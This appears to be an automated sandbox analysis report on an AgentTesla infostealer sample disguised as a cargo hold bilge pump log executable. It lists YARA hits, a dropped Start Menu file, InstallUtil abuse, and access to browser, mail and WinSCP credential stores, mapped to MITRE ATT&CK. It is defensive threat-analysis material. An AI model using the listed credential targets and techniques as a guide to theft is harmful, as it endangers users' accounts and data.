Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Queries volume information: C:\Users\user\AppData\Roaming\newfile\newfile.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Queries volume information: C:\Users\user\AppData\Roaming\newfile\newfile.exe VolumeInformation

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.InstallUtil.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.3230473196.00000000007B2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4151678724.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4151678724.000000000334E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3568807416.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2044932954.0000000003689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe PID: 7336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dll.exe PID: 6048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7608, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.InstallUtil.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.3230473196.00000000007B2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4151678724.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3568807416.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2044932954.0000000003689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe PID: 7336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dll.exe PID: 6048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7608, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.InstallUtil.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.3230473196.00000000007B2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4151678724.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4151678724.000000000334E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3568807416.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2044932954.0000000003689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe PID: 7336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dll.exe PID: 6048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7608, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 Valid Accounts	1 Valid Accounts	1 Deobfuscate/Decode Files or Information	1 Input Capture	34 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	111 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Obfuscated Files or Information	1 Credentials in Registry	631 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	311 Process Injection	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	111 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	261 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	11 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	261 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	311 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	61%	ReversingLabs	Win32.Spyware.Negasteal
SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	64%	Virustotal		Browse
SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	100%	Avira	HEUR/AGEN.1314454
SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	100%	Avira	HEUR/AGEN.1314454
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	61%	ReversingLabs	Win32.Spyware.Negasteal
